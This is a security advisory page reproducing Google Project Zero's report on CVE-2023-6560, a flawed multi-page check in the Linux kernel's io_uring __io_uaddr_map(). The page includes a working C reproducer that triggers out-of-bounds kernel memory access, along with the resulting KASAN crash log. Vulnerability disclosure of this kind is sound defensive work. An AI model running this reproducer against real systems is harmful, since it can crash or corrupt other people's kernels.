what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

io_uring __io_uaddr_map() Dangerous Multi-Page Handling

io_uring __io_uaddr_map() Dangerous Multi-Page Handling
Posted Jan 8, 2024
Authored by Jann Horn, Google Security Research

__io_uaddr_map() in io_uring suffers from dangerous handling of the multi-page region.

tags | exploit
advisories | CVE-2023-6560
SHA-256 | 36027428c2c544777c9a58e5240c8a00ac64b96a28b3c1c2a02ca9c040ca0b42

io_uring __io_uaddr_map() Dangerous Multi-Page Handling

Change Mirror Download
io_uring: __io_uaddr_map() handles multi-page region dangerously

__io_uaddr_map() wants to import a region from userspace, and then address the
imported region through the linear mapping area. This requires that the
imported region is physically contiguous.
A comment in __io_uaddr_map() explains that the imported region is usually
just a single page, in which case that is trivially fine.
However, __io_uaddr_map() also has code intended to permit multi-page regions,
in which case it tries to enforce that the entire region maps to the same
folio (in other words, the same head page):

/*
* Should be a single page. If the ring is small enough that we can
* use a normal page, that is fine. If we need multiple pages, then
* userspace should use a huge page. That's the only way to guarantee
* that we get contigious memory, outside of just being lucky or
* (currently) having low memory fragmentation.
*/
if (page_array[0] != page_array[ret - 1])
goto err;

This code is wrong for (more or less) two reasons:

1. It only checks the first and last page; it doesn't check any of the pages
in between. Userspace can easily create a set of adjacent VMAs such that
the first and last virtual page map to the same physical page, while pages
in between map to entirely unrelated pages.
2. It misunderstands how compound pages are represented in the kernel, and
will always reject the case it is supposed to allow:
`pin_user_pages_fast()` would return a set of adjacent `struct page`
instances that are associated with the same head page / folio; it
wouldn't return the same `struct page *` for every subpage.
Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page`.

So if this code is presented with a userspace region of the following shape,
containing individual 4K pages:

[page A]
[page B]
[...]
[page A]

then it will accept the region and assume that `page_to_virt(<page A>)`
returns the address of a page as big as the entire region. Accesses to the
first 4KiB of the region would work as intended; but accesses to later parts
of the region will be out-of-bounds accesses to unrelated pages.


Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until it
overruns the end of the first sq page:

```
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({ \\
typeof(x) __res = (x); \\
if (__res == (typeof(x))-1) \\
err(1, \"SYSCHK(\" #x \")\"); \\
__res; \\
})

#define NUM_SQ_PAGES 4

int main(void) {
int memfd_sq = SYSCHK(memfd_create(\"\", 0));
int memfd_cq = SYSCHK(memfd_create(\"\", 0));
SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000));
SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000));

// sq
void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0));
SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0));

// cq (rings)
void *cq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0));
*(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES;
for (int i=1; i<NUM_SQ_PAGES; i++)
SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0));

struct io_uring_params params = {
.flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/,
.sq_off = {
.user_addr = (unsigned long)sq_data
},
.cq_off = {
.user_addr = (unsigned long)cq_data
}
};
int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params));
printf(\"uring_fd = %d\
\", uring_fd);

/* submit nops */
int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL));
printf(\"enter returned %d\
\", enter_res);
}
```

It gives an ASAN splat like this (but note that the splat diagnostic is wrong because ASAN can't detect page OOB access properly):

```
[ 73.380288] ==================================================================
[ 73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00
[ 73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708
[ 73.383967]
[ 73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357
[ 73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 73.386778] Call Trace:
[ 73.387177] <TASK>
[ 73.387520] dump_stack_lvl+0x4a/0x80
[ 73.388117] print_report+0xcf/0x670
[...]
[ 73.389595] kasan_report+0xd8/0x110
[...]
[ 73.391954] io_submit_sqes+0x223/0xc00
[ 73.392570] __do_sys_io_uring_enter+0x965/0x1200
[...]
[ 73.397438] do_syscall_64+0x46/0xf0
[ 73.398004] entry_SYSCALL_64_after_hwframe+0x6e/0x76
[ 73.398787] RIP: 0033:0x7ff8ed2e7989
[ 73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48
[ 73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa
[ 73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989
[ 73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005
[ 73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100
[ 73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0
[ 73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000
[ 73.419272] </TASK>
[removed irrelevant alloc/free traces of the accessed memory region]
[ 73.449202]
[ 73.449471] The buggy address belongs to the object at ffff88810263a000
[ 73.449471] which belongs to the cache kmalloc-128 of size 128
[ 73.451228] The buggy address is located 0 bytes inside of
[ 73.451228] freed 128-byte region [ffff88810263a000, ffff88810263a080)
[ 73.453173]
[ 73.453429] The buggy address belongs to the physical page:
[ 73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a
[ 73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0
[ 73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2)
[ 73.457522] page_type: 0xffffffff()
[ 73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002
[ 73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000
[ 73.460305] page dumped because: kasan: bad access detected
[ 73.461091]
[ 73.461353] Memory state around the buggy address:
[ 73.462038] ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 73.463058] ffff888102639f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.465289] ^
[ 73.465791] ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 73.466795] ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
```

I'm not sure about the best way to fix it - since the compound page support
can't actually have worked, as explained above, maybe it's easiest to just
drop support for compound pages? \u03bfr alternatively we could fix that, but since
nobody seems to have used it, that'd maybe be unnecessary complexity...


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-22.

Related CVE Numbers: CVE-2023-6560.



Found by: jannh@google.com

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close